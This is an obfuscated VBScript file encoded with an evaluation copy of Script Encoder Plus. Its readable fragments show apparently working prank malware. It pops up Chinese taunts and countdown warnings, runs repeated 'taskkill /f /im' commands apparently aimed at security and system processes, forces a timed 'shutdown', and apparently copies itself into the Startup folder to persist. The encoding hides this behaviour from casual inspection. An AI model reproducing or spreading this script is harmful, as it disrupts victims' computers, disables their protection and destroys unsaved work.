#@~^mQcAAA==[b:~S/B?wl0nDBkSY|kljYPSd';D+mOnW(LAmO`EAkm.kaORktns^J#ldY~/anm|nM';D+mYA64N+/YvJdCakRk2\KkmEb)k+DPW/x^M+CYG4N+/OvJ/^.bwOk	Lc0r^+kX/D+sG4N+^Yr#lG	P+".rMPDAji:P	+aYlAkR.j	EmsN nX+P&^,YC/0VbVs,z6Pzb:,fvZY.lHRnaJ)SdRMExr^hNc+X+~z^~Dld30rV^P&W,zkh~2vT/9 6nr)S?RME	EmsN +X+~&1PYmd30kV^~&0,zb:~&TMw +XnJ=hd MExE^sN +Xn,z^,Ym/30k^sPJ0~zb:~t4EfKUowlxTe;R6Jlhd MEHJ1hNc+an,zm~Om/V3bs^P&6PJk:,/mW+(WaKMlz 6+rlkRD!HEmsNc+a+~&1POlkV3bVs~J0P&rsPfvZdm0n(WXR+X+rlhkR.j	J^h9R+XnPJmPDCd30k^V~zW~JkhP0dl6+ nX+JlAkR]EgE1:[c+X+PJm,Olk3Vk^V~&6PzbhP0?l6nj\1R6nJlAkR.E	EmsN nX+P&^,YC/0VbVs,z6Pzb:,F?m0nKMlz 6+rlkRD`HEmsNc+a+~&1POlkV3bVs~J0P&rsPFbjjDl.DR6+r)qdR"EUJ1:[ 6+,&m,YlkVVk^V,zWP&rsPFmOm4RnaJ)AdcD;1r^sN 6Pz1PDC/03rV^P&W,zks~|tlk^\Gxc+X+E)AdcD;xr^:9RnaPz^~Dld30r^V~J0,zksP5}n;K.lHRnaJ)SdRME1r^hNc+X+~z^~Dld30rV^P&W,zkh~5pKZ"PhRnX+r)hURM;xrmhNc+an,zm,Olk33bssPJ0,zr:~.kY.lH +X+ElS/R.;	J^:9 6n,z1PYm/0Vk^V~z6P&rsPDm-:KxNcna+r)S/ I;UrmhNcn6P&^,YldV0ksV,&6P&b:,D/slbUR6nJ=hd "jxr^:9R+Xn~z1PDld3Vr^V~z6~zb:~Ftlks\Kx +Xnr)AkRMExrms[R6nPJm~Om/30rV^Pz6~&ksP`quWdOc+a+rlhkR.;	Jmh[c+a+,&1POm/03k^V,&0,zr:,|#\Kx(h 3XwJ=AdRMEgJ^:[ 6nPJ^PDldV0kVs~J0~zbh,3-kD76wc+XnJ=hjR"EUE1:Ncn6Pz1~Olk30ksV~&6P&ks~3762 06wEl9W~j	P&V~b'8!!=hk D!xEmsN nX+J=r'b_F=sGWa)S/ D;UrmhNcn6P&^,YldV0ksV,&6P&b:,m:9Ra+r)h/T4GavJ你中招了！J*l:koAKacJ你永远关不掉我！r#=:do8GX`E你是傻子！J*lk{!l[KPjUPbV~k{qZ)da2m3+MRk22m3E傻子！J=qxr3F)dGWa):kL8WX`r电脑即将自爆！Jb)hdV4G6vE给你vZ秒，保存文件！JblS/m.raK /^nw~+!Z!!=k{T)9W~jgYrs,k'8T!=h/c.;xrmkm.k2Oc+a+rlq{kQq=VW62=hdRM;	J^sNc+6PJ^PDld30kss,z0,&ksP+X2sWM+MRn6nE=hjR";xrmh[c+6n~Jm~/4;DNGSx,O/,O1~电脑Zhj过热！！E)S/^.bwYcdV+w,XT!Z)S? DiUrmhNcn6P&^,/t;O9WAx,RmJls/T4Wo`r闹着玩的！E#=hdRMEUE6w^GDDRanJ=/a2C3n]c/2+zVJ电脑即将爆炸。r)d2l|3.c/2+mVr电脑即将爆炸。Jlkwl3DcdwlVJ电脑即将爆炸。r)j2l3.Rkw2mFE电脑即将爆炸。J=/a2)33]c/K+mVJ电脑即将爆炸。r)rxZ)N6~`xOk^~&'fZ)s/o(WXE即将蓝屏！JB\8ZMqP(1lV=r'b_F=s6ra)aYxhj UwnZbCV6Ws[D?cEkYCDD;aJbLJ'J)k+D~0bVn'6/ LY0bJ+vh/1.rwDRkZ.k2O6EsS	C:#lWbV+ ^KwzPhObG4CAA==^#~@


'
'*******************************************************
'
'    This script was produced automatically
'    by an evaluation demo copy of:
'
'     Script Encoder Plus v.3.0.3.9
'
'     User: Administrator
'
'      www.dennisbabkin.com/screnc
'
'    (Please register to make this message go away)
'     Go to Help -> Register ...
'
'*******************************************************
'
' SEED:
'    C88327C150143FBBBA29702AB6642C79E5104035666F7B4714889A21F46A9977
'    50456E3F819715ACB45972132783C7EC0BDA61E90CA472405E5B82AFECF86B04
'    95EE7D76EA1268EFF17682633796003FCDABD922DDA9DB8921D88E67E61F733C
'    AFD62A22EB746A60A780078677D9247446B54BC1C6CB2E40FA998F8B09897660
'    5718CB2687F1B0D484037FDEAE90F88C78D9747E1AE1BAFF4370994C1A044BC5


